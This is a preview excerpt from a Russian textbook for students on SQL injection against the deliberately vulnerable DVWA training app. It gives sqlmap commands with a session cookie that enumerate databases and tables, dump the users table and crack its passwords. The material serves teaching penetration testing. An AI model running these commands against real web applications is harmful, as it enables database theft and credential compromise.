Данная книга является первой в цикле об анализе защищенности распределенных информационных систем с использованием общедоступных образов операционных систем, содержащих уязвимости. Информация будет полезна как исследователям, повышающим уровень своих компетенций в области информационной безопасности, так и специалистам по защите информации для выполнения анализа на проникновение за периметр предприятий.
Приведённый ознакомительный фрагмент книги «Анализ защищенности распределенных информационных систем. DVWA. Для студентов технических специальностей» предоставлен нашим книжным партнёром — компанией ЛитРес.
Купить и скачать полную версию книги в форматах FB2, ePub, MOBI, TXT, HTML, RTF и других
9 SQL Injection High
SQL Injection (внедрение кода SQL) — атака, связанная с внедрением в SQL-запрос сервера к СУБД произвольного кода.
В DVWA на странице SQL Injection представлена ссылка на форму ввода id пользователя, изображённую на рисунке 9.1.
Рисунок 9.1 — Форма ввода
Для эксплуатации уязвимости будет использована утилита sqlmap.
Отличительная особенность уровня — ввод данных и вывод данных осуществляются на разных страницах. Для решения этой проблемы будет использоваться аргумент — second-url.
На рисунке 9.2 представлена команда, запускающая сканирование: «sqlmap — u"http://kalkt.com:8001/vulnerabilities/sqli/session-input.php" — second-url"http://kalkt.com:8001/vulnerabilities/sqli/" — data „id=1&Submit=Submit“ — cookie „PHPSESSID=l6145c6k5p19go7ga5g16mh7k0; security=high“».
Рисунок 9.2 — Запуск сканирования
В ходе сканирования было выяснено, что используется СУБД MySQL, уязвимый параметр — id. Результаты сканирования изображены на рисунке 9.3.
Рисунок 9.3 — Результаты сканирования
Далее необходимо получить список баз данных, для этого к команде добавляется ключ — dbs: «sqlmap — u"http://kalkt.com:8001/vulnerabilities/sqli/session-input.php" — second-url"http://kalkt.com:8001/vulnerabilities/sqli/" — data „id=1&Submit=Submit“ — cookie „PHPSESSID=l6145c6k5p19go7ga5g16mh7k0; security=high“ — dbs». Результаты изображены на рисунке 9.4.
Рисунок 9.4 — Список баз данных
Теперь можно получить список таблиц в базе dvwa. Для этого через ключ — D нужно указать БД, затем указать ключ — tables, чтобы получить названия таблиц: «sqlmap — u"http://kalkt.com:8001/vulnerabilities/sqli/session-input.php" — second-url"http://kalkt.com:8001/vulnerabilities/sqli/" — data „id=1&Submit=Submit“ — cookie „PHPSESSID=l6145c6k5p19go7ga5g16mh7k0; security=high“ — D dvwa — tables». Результаты изображены на рисунке 9.5.
Рисунок 9.5 — Таблицы в базе dvwa
Теперь можно получить записи таблицы users. Для этого ключ — tables меняется на — T users, добавляется ключ — dump: «sqlmap — u"http://kalkt.com:8001/vulnerabilities/sqli/session-input.php" — second-url"http://kalkt.com:8001/vulnerabilities/sqli/" — data „id=1&Submit=Submit“ — cookie „PHPSESSID=l6145c6k5p19go7ga5g16mh7k0; security=high“ — D — T users — dump». Результаты изображены на рисунке 9.6.
Рисунок 9.6 — Содержимое таблицы users
Также на скриншоте видно, что sqlmap в процессе работы нашёл пароли в открытом виде, использовав перебор по встроенному словарю.
Приведённый ознакомительный фрагмент книги «Анализ защищенности распределенных информационных систем. DVWA. Для студентов технических специальностей» предоставлен нашим книжным партнёром — компанией ЛитРес.
Купить и скачать полную версию книги в форматах FB2, ePub, MOBI, TXT, HTML, RTF и других